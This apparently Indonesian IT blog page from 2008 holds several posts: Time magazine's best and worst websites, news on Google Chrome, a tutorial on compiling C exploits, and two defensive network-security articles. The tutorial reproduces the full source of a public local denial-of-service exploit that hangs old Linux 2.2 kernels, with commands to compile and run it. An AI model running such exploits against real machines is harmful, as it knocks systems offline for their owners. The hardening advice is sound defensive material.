September 10, 2008 Posted by | Tutorial tentang IT | Leave a comment

Situs Terbaik dan Terburuk Menurut Majalah Time

Menurut Majalah Time tahun 2008, terdapat 25 situs yang dinilai penting dan berguna dalam kehidupan manusia.

Amazon.com, situs ini menempati peringkat pertama dan berguna untuk membantu penjualan online

* Bbc.co.uk, situs asal Inggris yang memiliki 33 bahasa dan radio Internet menjadi pilihan utama. Situs pemberitaan ini, menurut Time, menjadi situs kedua paling penting karena conten beritanya yang lengkap.
* Espn.com, situs berita olah raga yang paling dicari orang.
* Google.com, yang didirikan Larry Page dan Sergey Brin adalah search engine terbesar saat ini, dilengkapi dengan fitur email gratis, blog, hingga Google Earth yang mampu menampilkan citra satelit secara gratis dan lengkap
* Yahoo.com, dinilai unggul karena memiliki layanan email gratis unlimited dan chat Yahoo!
* Messenger, juga portal Yahoo! Answers yang unik dan mampu menampung lebih dari 130 juta pertanyaan untuk dicarikan jawabannya.
* Wikipedia, situs ensiklopedia gratis
* Ebay.com, situs yang masih berusia empat tahun ini bisa mengumpulkan USD 100 juta atau lebih dari 900 miliar pada tahun 2007 kemarin.
* Flickr.com dan YouTube.com, keduanya masing-masing merupakan situs foto dan video yang juga masuk ke dalam range situs bermanfaat bagi pengguna web.
* Usa.gov, satu-satunya situs pemerintah dari Amerika yang masuk ke daftar situs penting.

25 Website Terbaik :
1. amazon.com
2. bbc.co.uk
3. citysearch.com
4. craigslist.org
5. del.icio.us
6. digg.com
7. ebay.com
8. espn.com
9. facebook.com
10.factcheck.org
11.flickr.com
12.google.com
13.howstuffworks.com
14.imdb.com
15.youtube.com
16.kayak.com
17.nationalgeographic.com
18.netflix.com
19.technorati.com
20.tmz.com
21.usa.gov
22.televisionwithoutpity.com
23.webmd.com
24.wikipedia.org
25.yahoo.com

Sementara menurut Majalah Time terdapat beberapa situs yang dinilai buruk atau jelek atau tidak berguna.
Myspace.com, situs jejaring social yang hampir mirip dengan Friendster ini tak mampu mengumpulkan 20 ribu pengguna internet di seluruh dunia untuk membuat blog, baik tulisan, foto dan video. Selain itu, MySpace juga dipenuhi dengan identitas palsu dari anggotanya yang kemudian mengirimkan virus atau promosi produk daripada mencari teman.

5 Website Terburuk :
1. eharmony.com
2. evite.com
3. meez.com
4. myspace.com
5. secondlife.com

September 9, 2008 Posted by | Tutorial tentang IT | Leave a comment

Google Akui Bentuk Senjata Ampuh untuk Microsoft

google

google

Eric Schmidt, kepala eksekutif Google mengakui Kamis lalu, bahwa telah terdapat komponen yang aneh dalam peluncuran web browser Internet, Chrome, milik perusahaan raksasa, Google, yang dianggap mampu melawan dominasi software Microsoft. Schmidt, dalam Republican National Convention di St. Paul, mengungkapkan Microsoft memiliki sejarah dalam memadukan berbagai kelebihan aplikasinya, namun Schmidt yakin bahwa browser baru Google ini akan dapat mengalahkan browser miliki Microsoft.

Namun, Schmidt menambahkan bahwa ada keanehan ketika me-launching Google Chrome, yakni source code Chrome akan menjadi open source, sehingga user tidak perlu membayar dalam penggunaan atau ketika mengadopsi software ini, yang menurut Google akan menjadi competitor IE (Internet Explorer) milik Microsoft, sang pemimpin browser Internet.

“Hal yang perlu diubah dari masa lalu adalah bahwa orang mulai membangun aplikasi yang powerful untuk browser dan browser seperti Internet Explorer tidak akan mampu menjalankan aplikasi yang kompleks. Ada kesempatan untuk sebuah platform dan platform ini akan menjalankan aplikasi baru yang banyak, yang tidak bisa dilakukan di IE7.”, kata Schmidt.

Chrome sendiri merupakan senjata Google terbaru dalam rangka memenuhi ambisinya untuk menjadi pemimpin seluruh area Internet. Namun, peperangan pada tahun 1990 tetap dimenangkan oleh Microsoft dengan aplikasi browser-nya yang telah mendominasi area Internet melawan Nestcape Navigator. Menurut survey yang dilakukanoleh perusahaan peneliti Net Applications, penggunaan Internet Explorer mencapai 74%, jauh lebih banyak bila dibandingkan dengan 18% atas penggunaan Firefox. (h_n)

September 9, 2008 Posted by | Tutorial tentang IT | Leave a comment

Meng-compile Eksploit Dalam Bahasa C

Pada saat penggembaraan kita dalam melakukan hacking sering kali kita memperoleh program (eksploit) yang dapat digunakan untuk mengeksploitasi sebuah sistem. Program ini tidak jarang berbentuk source code bukan executable dalam bahasa C yang perlu kita compile agar menjadi bentuk executable yang dapat dijalankan.

Di samping itu, cara belajar hacking yang terbaik adalah dengan mempelajari program orang lain yang telah sukses dalam melakukan hacking. Atau melihat struktur program yang ada. Di Linux, proses belajar ini menjadi sangat cepat karena sebagian besar source code Linux tersedia / terbuka & dapat kita lihat menggunakan teks editor biasa pada directory:

/usr/src/linux

Tentunya sebelum melihat demikian banyak source code ada baiknya anda membaca-baca berbagai teknik yang berkaitan dengan kerja sistem operasi / Linux maupun kerja Internet yang di dokumentasikan dalam bentuk file Request For Comment (RFC) yang dapat di ambil secara gratis di berbagai situs Internet, seperti http://www.internic.net, http://www.linuxdoc.org dsb.

Contoh sebuah source code eksploit untuk Linux kernel 2.2-2.3.99 saya tampilkan berikut ini.

/*            [http://b0f.morphed.net] – eth0                */
/*                                                       */
/* Vulnerable
Linux 2.2.12
Linux 2.2.13
Linux 2.2.14
Linux 2.3.99-pre2

The following exploit code will hang any Linux machine on various
Pentium platforms.

Note that this does not require any special privileges, and any user
Can compile and run it, so watch out kiddies…

The send system call immediately puts the kernel in a loop spewing
kmalloc: Size (131076) too large forever
(or until you hit the reset button).

Apparently UNIX domain sockets are ignoring the
/proc/sys/net/core/wmem_max parameter,
despite the documentation to the contrary.


[information provided by Jay Fenlason]
[http://b0f.morphed.net]
[buffer0verfl0w security]
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

char buf[128 * 1024];

int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;

for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '';

SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data)
);
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr)
);
return 0;
}

Eksploit ini merupakan teknik yang membuat buffer (stack) over flow sehingga mesin Linux anda tidak bisa beroperasi lagi seperti hang, kecuali anda reset. Kebetulan saya menggunakan Mandrake 8.0 yang menggunakan kernel 2.4.3 yang tidak terpengaruh terhadap eksploit ini.

Setelah ada mengedit file source code dalam bahasa C dengan teks editor biasa. Langkah selanjutnya adalah mengcompile-nya. Pada masa lalu (jaman DOS 3.3), saya biasanya menggunakan Turbo C untuk mengcompile source code. Saat ini dengan menggunakan Linux, jika di install fasilitas development-nya, maka GNU C Compiler (gcc) biasanya merupakan bagian integral dari fasilitas development pada Linux.

Pada Linux, proses compiling dapat dilakukan secara sederhana saja, dengan menuliskan perintah:

$ gcc eksploit.c –o eksploit

maka file eksploit.c akan di compile menjadi executable yang dalam hal ini di  beri nama eksploit (oleh perintah –o eksploit) yang kemudian dapat dijalankan dengan perintah:

$ ./eksploit

Jika anda mulai melakukan pemrogramman yang kompleks dengan banyak source file C, maka biasanya dibantu dengan file Makefile yang akan mengatur cara-cara membuat objek code & compile dari masing-masing source code.

September 8, 2008 Posted by | Tutorial tentang IT | 1 Comment

Enam (6) Langkah Mengamankan Jaringan & Sistem Komputer Dari Serangan Hacker

Secara umum ada enam (6) langkah besar yang mungkin bisa digunakan untuk mengamankan jaringan & sistem komputer dari serangan hacker. Adapun langkah tersebut adalah:

1.    Membuat Komite Pengarah Keamanan.
2.    Mengumpulkan Informasi
3.    Memperhitungkan Resiko
4.    Membuat Solusi
5.    Implementasi & Edukasi / Pendidikan.
6.    Terus Menerus Menganalisa, dan Meresponds.

cara mengamankan hacker

cara mengamankan hacker


Langkah 1: Membuat Komite Pengarah Keamanan.

Komite pengarah sangat penting untuk dibentuk agar kebijakan keamanan jaringan dapat diterima oleh semua pihak. Agar tidak ada orang terpaksa, merasa tersiksa, merasa akses-nya dibatasi dalam beroperasi di jaringan IntraNet mereka.  Dengan memasukan perwakilan dari semua bidang / bagian, maka masukan dari bawah dapat diharapkan untuk dapat masuk & di terima oleh semua orang.

Dengan adanya komite pengarah ini, akan memungkinkan terjadi interaksi antara orang teknik / administrator jaringan, user & manajer. Sehingga dapat dicari kebijakan yang paling optimal yang dapat di implementasikan dengan mudah secara teknis.


Langkah 2: Mengumpulkan Informasi

Sebelum sebuah kebijakan keamanan jaringan di implementasikan, ada baiknya proses audit yang lengkap dilakukan. Tidak hanya mengaudit peralatan & komponen jaringan saja, tapi juga proses bisnis, prosedur operasi, kesadaran akan keamanan, aset. Tentunya proses audit harus dari tempat yang paling beresiko tinggi yaitu Internet; berlanjut pada home user & sambungan VPN. Selain audit dari sisi external, ada baiknya dilakukan audit dari sisi internet seperti HRD dll.

Langkah 3: Memperhitungkan Resiko

Resiko dalam formula sederhana dapat digambarkan sebagai:

Resiko = Nilai Aset * Vurnerability * Kemungkinan di Eksploit

Nilai aset termasuk nilai uang, biaya karena sistem down, kehilangan kepercayaan mitra / pelanggan. Vurnerability termasuk kehilangan data total / sebagian, system downtime, kerusakan / korupsi data.

Dengan mengambil hasil dari langkah audit yang dilakukan sebelumnya, kita perlu menanyakan:

•    Apakah kebijakan keamanan yang ada sekarang sudah cukup untuk memberikan proteksi?
•    Apakah audit secara eksternal berhasil memvalidasi ke keandalan kebijakan keamanan yang ada?
•    Adakah proses audit mendeteksi kelemahan & belum tertuang dalam kebijakan keamanan?
•    Apakah tingkat keamanan, setara dengan tingkat resiko?
•    Apa aset / informasi yang memiliki resiko tertinggi?

Dengan menjawab pertanyaan di atas merupakan titik awal untuk mengevaluasi kelengkapan kebijakan informasi yang kita miliki. Dengan mengevaluasi jawaban di atas, kita dapat memfokuskan pada solusi yang sifatnya macro & global terlebih dulu tanpa terjerat pada solusi mikro & individu.


Langkah 4: Membuat Solusi

Pada hari ini sudah cukup banyak solusi yang sifatnya plug’n’play yang dapat terdapat di pasar. Sialnya, tidak ada satu program / solusi yang ampuh untuk semua jenis masalah. Oleh karena kita kita harus pandai memilih dari berbagai solusi yang ada untuk berbagai kebutuhan keamanan. Beberapa di antaranya, kita mengenal:

•    Firewall.
•    Network Intrusion Detection System (IDS).
•    Host based Intrusion Detection System (H-IDS).
•    Application-based Intrusion Detection System (App-IDS).
•    Anti-Virus Software.
•    Virtual Private Network (VPN).
•    Two Factor Authentication.
•    Biometric.
•    Smart cards.
•    Server Auditing.
•    Application Auditing.
•    Dll – masih ada beberapa lagi yang tidak termasuk kategori di atas.

Langkah 5: Implementasi & Edukasi / Pendidikan.

Setelah semua support diperoleh maka proses implementasi dapat di lakukan. Proses instalasi akan sangat tergantung pada tingkat kesulitan yang harus di hadapi. Satu hal yang harus di ingat dalam semua proses implementasi adalah proses pendidikan / edukasi jangan sampai dilupakan. Proses pendidikan ini harus berisi:

•    Detail dari sistem / prosedur keamanan yang baru.
•    Effek dari prosedur keamanan yang baru terhadap aset / data perusahaan.
•    Penjelasan dari prosedur & bagaimana cara memenuhi goal kebijakan keamanan yang baru.

Peserta harus di jelaskan tidak hanya bagaimana / apa prosedur keamanan yang dibuat, tapi juga harus dijelaskan mengapa prosedur keamanan tersebut di lakukan.


Lan
gkah 6: Terus Menerus Menganalisa, dan Meresponds.

Sistem selalu berkembang, oleh karena itu proses analisa dari prosedur yang dikembangkan harus selalu dilakukan. Selalu berada di depan, jangan sampai ketinggalan kereta api

September 8, 2008 Posted by | Tutorial tentang IT | Leave a comment

Meningkatkan Security Jaringan Komputer Anda

Situs Departemen Luar Negeri ‘dijebol’ hacker!!! Situs http://www.mil.id ‘diobrak-abrik’ hacker!!! Bagaimana bila hal ini terjadi pada jaringan komputer Anda ?

Lalu lintas komunikasi data melalui Internet dengan TCP/IP-nya telah menjadi suatu kekuatan telekomunikasi yang sangat besar. Tiap jam, menit, hingga detik, data-data elektronik yang berharga lalu lalang dalam Internet tersebut. Tentunya hal tersebut menggugah inspirasi orang-orang tertentu untuk mencoba mendapatkan data-data tersebut. Hal ini menjadi ancaman serius bagi sekuriti di Internet. Untuk itu, kita harus lebih waspada terhadap usaha-usaha yang mengancam integritas data yang kita miliki. Tulisan ini mencoba memberikan alternatif sederhana kepada para pembaca yang hendak memahami masalah sekuriti di Internet. Pada bagian akhir, terdapat sebuah daftar singkat yang berisi tentang sumber-sumber dokumen maupun situs di Internet yang berkaitan dengan tulisan ini dan dapat dijadikan referensi untuk lebih mendalami masalah sekuriti di Internet.
Secara umum, masalah sekuriti di Internet dapat dipandang dari dua sisi penting. Sisi pertama adalah integritas data yang dikirimkan melalui jaringan Internet (kita sebut saja integritas pengiriman data) dan sisi berikutnya adalah tingkat sekuriti dalam jaringan komputer itu sendiri (kita sebut sekuriti jaringan internal). Mari kita bahas satu-persatu dari sisi-sisi tersebut.

Integritas Pengiriman Data
Pada saat kita mengirimkan data melalui jaringan Internet, kita selalu ingin agar data yang kita kirimkan tersebut sampai di tujuan dengan selamat dan tidak mengalami campur tangan pihak lain. Syarat ini menjadi jauh lebih utama apabila data yang kita kirimkan tergolong kategori data rahasia.
Pada saat kita kirimkan, data tersebut akan melalui berbagai jenis komputer, router, atau gateway dan melintasi berbagai macam media fisik komunikasi. Kita mempertaruhkan integritas data kepada keanekaragaman di atas. Tentunya kita tidak mungkin memeriksa tingkat sekuriti di setiap hop/titik yang dilalui oleh data tersebut karena tingkat sebaran dan kepemilikan hop yang sangat beraneka ragam. Salah satu solusi yang dapat diterapkan adalah enkripsi data. Tujuan utama dari solusi ini adalah mencegah terjadinya curi-dengar (eavesdropping) terhadap data yang kita kirimkan maupun yang kita terima. Jika seorang “eavesdropper” melakukan tindakan curi-dengar, ia akan memperoleh data-data yang terenkripsi saja sehingga tidak mencerminkan isi data yang sebenarnya.
Proses enkripsi data bisa diterapkan di lapisan (layer) tertentu dari protokol TCP/IP. Seperti yang telah diketahui, protocol TCP/IP memiliki 4 (empat) lapisan guna menunjang proses komunikasi data. Lapisan tersebut terdiri dari Application Layer, Transport Layer, Internet Layer, Network Access Layer. Kita bisa menerapkan proses enkripsi di masing-masing lapisan tersebut. Masing-masing implementasi dari lapisan-lapisan tersebut adalah sebagai berikut :

•    Network Access Layer
Bentuk nyata dari lapisan ini adalah bagian hardware dari sebuah komputer. Bila kita akan menerapkan proses enkripsi di lapisan ini, maka kita harus mencari atau menciptakan hardware khusus yang menangani masalah enkripsi data. Beberapa lembaga penelitian telah mulai menggali lebih dalam kemungkinan penciptaan hardware yang memiliki kemampuan enkripsi data yang lebih baik.

•    Internet Layer
Dalam protokol TCP/IP, Internet layer diimplementasikan dalam Internet Protocol (IP). Protokol ini berbentuk software yang mengatur tentang pengalamatan dan proses routing. Protokol ini telah diberikan nilai tambah tersendiri untuk meningkatkan sekuriti data yang dikirimkannya. Nilai tambah tersebut masing-masing adalah Authentication Header dan Encapsulating Security Payload.

Authentication Header (AH) adalah sebuah header tambahan yang bertujuan untuk memberikan jaminan atas syarat integritas data yang dikirimkan dan syarat keaslian sumber pengirim beserta data yang dikirimkan (authentication). Header ini berada di posisi paling akhir dari header-header pada lapisan IP dan sebelum header Encapsulating Security Payload (ESP). AH juga bisa menjamin non-repudiation dari sebuah data apabila penerapan AH menggunakan algoritma kriptografi tertentu. Non-repudiation adalah syarat dimana pihak penerima bisa membuktikan bahwa pihak pengirim benar-benar mengirimkan data yang diterima pihak penerima meskipun pihak pengirim tidak mengakuinya. Informasi yang terkandung di dalam AH ini dihasilkan dari perhitungan seluruh bagian dari datagram IP (mulai dari header IP, header protokol di atas IP, hingga data aslinya). Bila pihak penerima menerima datagram yang tidak otentik berdasarkan penilaian AH, datagram tersebut akan diabaikan. Mekanisme ini bisa digunakan untuk mencegah aksi-aksi IP spoofing. Aksi ini bertujuan agar penyusup bisa berpura-pura sebagai pihak pengirim dengan cara menebak datagram yang akan dikirimkan.

Encapsulating Security Payload (ESP) adalah sebuah mekanisme tambahan pada datagram IP yang bertujuan untuk meningkatkan confidentiality dan integritas data. Confidentiality adalah suatu syarat dimana penerima mengetahui arti yang sebenarnya dari data yang dikirimkan sedangkan pihak lain yang tidak diharapkan tidak akan mengerti arti yang sebenarnya dari data yang dikirimkan. Hasil implementasi ESP ini adalah sebuah datagram IP yang bagian datanya telah terenkripsi. ESP diletakkan di posisi paling akhir dari serangkaian IP header dan sebelum bagian pertama data. ESP memiliki header tersendiri yang disebut ESP Header. Untuk modus paling aman, format ESP Header adalah awal dari header tersebut tidak dienkripsi sedangkan sisa header dan seluruh bagian data dienkripsi.

|<—-     Tidak dienkripsi      —->|<—–    Dienkripsi    ——>|
+————+——————-+————+———————–+
| IP Header  | IP Header lainnya | ESP Header | data yang dienkripsi  |
+————+——————-+————+———————–+

Bagian header yang tidak dienkripsi memberikan keterangan tentang cara mendekripsi dan memroses data yang dienkripsi tersebut. ESP dapat diterapkan pada setiap jenis transport layer (TCP, UDP) yang digunakan. Mekanisme ini lebih banyak diterapkan untuk modus Tunnel. Modus Tunnel adalah sebuah modus pada pengiriman data yang lebih bersifat privat dan khusus melalui jaringan Internet. Intranet adalah salah satu pengguna modus Tunnel tersebut terutama Intranet yang digunakan untuk menghubungkan cabang-cabang yang tersebar di berbagai daerah.

•    Transport Layer
Dalam konsep TCP/IP, secara umum transport layer dibagi menjadi dua yaitu Transmission Control Protocol (TCP) dan User Datagram Protocol (UDP). Pada lapisan ini, belum begitu banyak mekanisme-mekanisme yang dikembangkan untuk menambahkan aspek sekuriti. TCP sendiri sudah memiliki rutin-rutin yang cukup kompleks dalam mengolah data yang ia terima.

•    Application Layer
Lapisan ini adalah lapisan yang langsung berhubungan dengan user. Apa yang dilihat oleh user pada layar monitor komputer adalah tampilan dari Application Layer tersebut.
Teknik-teknik yang digunakan untuk mengenkripsi data pada lapisan aplikasi ini telah banyak berkembang dan mencapai hasil yang cukup memuaskan. Berbagai macam jenis algoritma enkripsi telah dikembangkan dan beberapa di antaranya telah menjadi standar internasional. Beberapa algoritma yang cukup terkenal adalah Data Encryption Standard (DES), Triple-DES, RC2/RC4,  International Data Encryption Algorithm (IDEA) dan Skipjack. Algoritma DES  dan IDEA telah banyak diterapkan di dunia sedangkan algoritma lainnya telah dipatenkan. Dari algoritma-algoritma di atas, dibuatlah berbagai macam software pengenkripsi. Salah satu yang terkenal dan bersifat shareware adalah Pretty Good Privacy (PGP).
Penerapan software enkripsi pada Application layer bisa bermacam-macam. Salah satunya, kita bisa mengenkripsi isi dari eletronic mail yang kita buat sebelum kita kirimkan. Selain itu, kita juga bisa mengenkripsi file-file yang akan kita berikan kepada orang lain melalui FTP. Pesan-pesan elektronik pun dapat kita enkripsi terlebih dahulu sebelum kita kirimkan. Setelah sampai di tujuan, penerima dapat mendekripsi pada layer yang sama apa yang ia terima sehingga mencerminkan arti yang sebenarnya.
Khusus dalam HyperText Transfer Protocol (HTTP), telah dikembangkan berbagai macam mekanisme pengamanan data yang ditransfer melalui protokol ini. Protokol HTTP menjadi tulang punggung dalam World Wide Web (WWW) dan kita lebih sering melihatnya dalam bentuk homepage di situs-situs Internet. Beberapa perusahaan di dunia telah memanfaatkan WWW sebagai salah satu saran penghubung kepada konsumen dan pelanggan mereka. Bahkan WWW telah pula digunakan sebagai penghubung antar bagian perusahaan mereka sendiri dalam teknologi Intranet. Untuk menjamin integritas data yang dikirimkan, para pakar kriptografi telah mengembangkan beberapa mekanisme enkripsi untuk protokol tersebut. Dua dari berbagai mekanisme yang ada di Internet adalah SecureHTTP (SHTTP) dan Secure Socket Layer (SSL). SSL dikembangkan oleh Netscape dan telah diimplementasikan di beberapa situs di Internet. Dengan adanya mekanisme-mekanisme ini, pengiriman nomor rekening, kata kunci rahasia, dan data-data rahasia lainnya bisa dilakukan di Internet dengan lebih aman.

Sekuriti Jaringan Internal
Sisi selanjutnya adalah keamanan dari jaringan komputer internal. Pada saat kita memutuskan untuk membangun sebuah jaringan komputer yang terhubung ke Internet, saat itu pula kita telah mengambil resiko untuk berhadapan dengan ancaman-ancaman penyusupan dan pengrusakan data dari Internet. Oleh karena itu, kita harus mempersiapkan jaringan komputer kita dengan sebaik mungkin untuk menghadapi serangan-serangan dan ancaman-ancaman tersebut.
Masalah sekuriti jaringan internal ini meliputi beberapa aspek. Untuk mudahnya, masalah tersebut dapat dipecah menjadi dua bagian yaitu bagian software-hardware dan bagian user.

•    Bagian software-hardware
Dalam membangun sebuah jaringan komputer, kita memiliki kebebasan dalam merancang, baik dari struktur jaringan maupun konfigurasi hardware dan jenis program yang akan digunakan. Struktur jaringan yang akan direalisasikan dapat dirancang sedemikian rupa sehingga memiliki tingkat sekuriti yang tinggi. Sebagai contoh, kita bisa membuat sebuah jaringan perimeter atau lebih dikenal dengan sebutan DeMilitary Zone (DMZ) yang memberikan layanan dan akses seperlunya saja kepada Internet. Jaringan perimeter ini merupakan jaringan yang langsung berhadapan dengan Internet setelah melalui sebuah router atau gateway.
Dari segi hardware, kita dapat menentukan spesifikasi hardware yang tepat sesuai kebutuhan dan tugas yang akan diberikan kepada hardware tersebut. Sebagai contoh, untuk menjadi sebuah mail server yang menangani 100 buah mailing list atau lebih, tentunya kebutuhan akan jumlah memory/RAM dan swap memory yang disediakan menjadi melonjak. Selain itu, bila terdapat usaha-usaha pengrusakan pada mail server tersebut dengan berbagai cara seperti mail bombing, setidak-tidaknya mail server kita masih bisa bertahan.
Pada bagian software, kita bisa menggunakan sistem operasi dan software-software yang telah dikenal kehandalannya. Hal ini bertujuan supaya sistem operasi maupun software yang kita gunakan mampu menahan gempuran atau serangan dari Internet dan tidak sampai merusak hardware. Selain itu, sebaiknya kita selalu menggunakan software-software keluaran terbaru. Untuk itu, kita harus lebih sering memantau perkembangan software yang kita gunakan tersebut.
Setelah kita memilih sistem operasi dan software yang akan digunakan, kita harus mengkonfigurasi sistem operasi dan software tersebut agar tidak memiliki hole-hole yang bisa dieksplorasi oleh para penyusup dari Internet. Apabila kita tidak waspada, hole-hole yang sudah umum pun bisa muncul pada sistem jaringan komputer kita. Berikut ini terdapat beberapa titik penting pada sistem operasi berbasis Unix yang perlu mendapat perhatian.

•    Perintah-perintah berawalan huruf  “r”
Perintah-perintah berawalan huruf “r” (rlogin, rsh, rwho, dlsb) perlu ditinjau ulang dari segi kebutuhan. Apabila kita tidak memerlukan fungsi-fungsi perintah di atas maka kita matikan perintah-perintah tersebut. Jika kita memerlukannya, kita harus lebih hati-hati dalam mengkonfigurasi file-file yang berhubungan dengan setting perintah-perintah tersebut. Untuk perintah-perintah tersebut, file konfigurasi yang penting adalah /etc/hosts.equiv.

•    File-file dengan suid
File dengan konfigurasi suid adalah file (umumnya berupa program) yang apabila dieksekusi akan memiliki hak setingkat dengan pemilik (owner) dari file tersebut. Sebagai contoh, perintah “chpass” termasuk jenis file suid. Perintah “chpass” ini berguna untuk merubah data-data tentang user seperti: nama lengkap, alamat kantor, alamat rumah, dlsb. Pada dasarnya, perintah “chpass” ini melakukan perubahan pada file yang berisi  user password  dari komputer tersebut. Oleh karena itu, perintah tersebut memerlukan konfigurasi suid root karena file yang berisi user password hanya bisa diubah oleh root   sendiri atau memiliki hak akses setara dengan root. File-file dengan suid root harus dibatasi jumlahnya sesuai kebutuhan. Bila tidak, para penyusup bisa memanfaatkan kelemahan ini untuk memperoleh hak akses setara root pula. Seringkali para penyusup menyiapkan backdoor melalui file-file suid tersebut sehingga saat penyusup ingin kembali masuk ke dalam sistem, ia bisa menggunakan backdoor tersebut. Salah satu langkah penanggulangannya adalah dengan membuat daftar file suid di saat setelah konfigurasi sistem operasi selesai dan melakukan pemeriksaan secara rutin yang kemudian dibandingkan dengan daftar file pertama.

•    File & directory permission
Pada saat mengkonfigurasi sistem operasi, file permission dan directory permission sebaiknya ikut dikonfigurasi lebih lanjut selain konfigurasi awal yang telah disediakan dari pencipta sistem operasi tersebut. Batasi user hanya untuk bisa memiliki akses penuh pada home directory user tersebut.

•    Network File System (NFS)
NFS memungkinkan kita membuat file system yang berada di komputer lain seolah-olah berada di komputer kita. Tetapi, apabila kita kurang hati-hati dalam mengkonfigurasi-nya, hal ini menjadi makanan empuk bagi para pengrusak. Kita harus memilih direktori mana saja yang perlu dibuat menjadi terbuka terhadap komputer lain. Hak akses juga harus menjadi perhatian sehingga kita dapat menempatkan file-file pada porsi yang sebenarnya. Perbaikan-perbaikan (patches) untuk NFS juga telah tersedia di Internet karena NFS memiliki beberapa titik kelemahan.

•    majordomo
Majordomo adalah salah satu software yang menangani mailing list dan sudah tersebar sangat luas. Gunakan selalu majordomo versi di atas 1.91 karena versi di bawah 1.91 memiliki bugs yang cukup berbahaya.

•    Fingerd
Utilitas ini sudah cukup terkenal sebagai salah satu alat utama dalam Internet worm yang sempat melumpuhkan jaringan Internet di tahun 1988. Hingga saat ini, utilitas finger masih sering digunakan sebagai langkah awal memantau sistem yang akan disusupi. Meskipun perbaikan-perbaikan terhadap bug yang ada di fingerd telah dilakukan, sebaiknya layanan ini ditutup untuk akses dari luar sehingga perintah finger hanya bisa dilakukan sebatas sistem atau komputer itu saja.

•    File /etc/inetd.conf
File /etc/inetd.conf ini berisi konfigurasi service-service yang dijalankan oleh inetd. Sebaiknya file ini diatur pada mode 600 dan dimiliki oleh root. Selain itu, sebaiknya kita menutup layanan-layanan networking yang tidak kita perlukan. Konfigurasi awal dari instalasi sistem operasi seringkali membuka layanan-layanan networking yang tidak kita butuhkan.

•    Anonymous FTP
Anonymous FTP disediakan bagi user umum untuk mendapatkan file-file yang kita publikasikan. Hal yang perlu diperhatikan dari sudut pandang sekuriti adalah konfigurasi hak akses yang diberikan pada direktori-direktori yang kita publikasikan. Selain itu, selalu gunakan versi terbaru untuk FTP daemon yang kita gunakan. Versi FTP daemon yang sudah lama memiliki perintah-perintah jarak jauh untuk meletakkan file ataupun membaca file yang berada di direktori selain direktori FTP tersebut.

•    SMTP Server
SMTP server adalah server yang bertugas mengatur penghantaran electronic mail dari pengirim ke penerima. SMTP server yang sering digunakan adalah sendmail. Sendmail ini telah terkenal kehandalannya tetapi juga memiliki bugs yang bisa digunakan untuk mendapatkan hak akses setara root. Untuk meminimalkan resiko ini, selalu gunakan versi terbaru dari sendmail. Kita juga bisa menaikkan tingkat proses logging hingga tingkat/level 9. Pada tingkat tersebut, sendmail logger akan mendeteksi usaha-usaha eksploitasi terhadap kelemahan sendmail.

•    HTTP Server / Web Server
Baru-baru ini, Web server merupakan salah satu titik eksploitasi yang paling terkenal. Dengan mengeksploitasi bugs yang ada di web server ini, para penyusup bisa mendapatkan hak akses setara root. Hal ini mengakibatkan data-data homepage yang ada di web server itu diacak-acak dan diganti sesuka hati penyusupnya. Untuk mencegah terjadinya hal ini, beberapa langkah pencegahan perlu diambil. Beberapa di antaranya yang cukup dominan:
•    Gunakan selalu HTTP daemon yang terbaru dan telah diketahui hingga saat ini belum memiliki bugs. Contoh: NCSA httpd versi 1.5.
•    Hilangkan script-script yang tidak perlu yang memerlukan akses ke file system. Umumnya, script-script tersebut disebut dengan Common Gateway Interface (CGI) script.
•    Lakukan konfigurasi sebaik-baiknya terhadap CGI script yang kita perlukan sebagai penghubung antara user dengan server.
•    Gunakan tapis (filter) untuk mendeteksi masukan-masukan yang diberikan oleh user terutama terhadap karakter-karakter yang berpotensi untuk merusak seperti: \n \r ( . , / ; ~ ! ) > | ^ & $ ` < %.

Selain dari itu, kita bisa menggunakan software firewall untuk membatasi akses dan melakukan pemantauan terhadap aliran transfer data. Software firewall ada yang bersifat shareware dan komersial. Cara instalasi, penggunaan, dan konfigurasinya tidak dibahas pada tulisan ini karena topik tersebut cukup luas
Dalam suatu sistem yang terproteksi cukup ketat, seringkali kita tidak bisa mengakses komputer kita dari jarak jauh. Untuk memenuhi kebutuhan tersebut tanpa harus mengorbankan tingkat sekuriti sistem, kita bisa menempuh dua cara. Cara pertama adalah merubah program yang bertugas menerima akses langsung dari luar sehingga kita bisa memonitor, mencatat maupun membatasi akses yang diberikan. Contoh program yang menerima akses langsung dari Internet adalah telnetd. Cara kedua adalah dengan menyiapkan hardware khusus yang bertindak sebagai perantara antara user dengan komputer.  Fungsi dari hardware khusus ini tidak berbeda jauh dengan software yang diubah pada cara pertama.

•    Bagian User
Jika sisi software telah dikonfigurasi dengan baik, sisi user yang perlu mendapat perhatian. Seringkali, user pada suatu sistem memilih kata password yang mudah ditebak. Penulis pernah mencoba beberapa password account yang isinya mudah ditebak, antara lain: “Komputer”, “Memori”,  kombinasi nama user, nama perusahaan penghasil meja komputer, merek monitor/keyboard/casing komputer, dlsb. Untuk itu, sebagai system administrator, kita perlu memberikan arahan dan anjuran kepada user untuk tidak menggunakan kata-kata yang mudah ditebak sebagai password. Selain itu, jangan menuliskan password pada kertas atau benda apa pun. Walaupun dalam film “War Games” (sebuah film yang cukup terkenal di kalangan hacker di Amerika) telah ditunjukkan akibat penulisan password tetapi masih saja terdapat user yang menuliskan password-nya. Tentunya sudah cukup banyak tips untuk membuat password yang baik. Jika dipandang perlu, konfigurasi password user bisa diatur agar user diharuskan memperbaharui password-nya secara periodik. Cara lain yang bisa dilakukan adalah menjalankan program yang berfungsi memecahkan kode password pada file password yang Anda miliki. Program semacam ini cukup banyak di Internet dan tersedia untuk berbagai platform sistem operasi. Pada sistem operasi Unix, program yang cukup terkenal adalah Crack. Dengan menggunakan program ini, kita dapat mengetahui apakah user telah memilih password dengan baik.

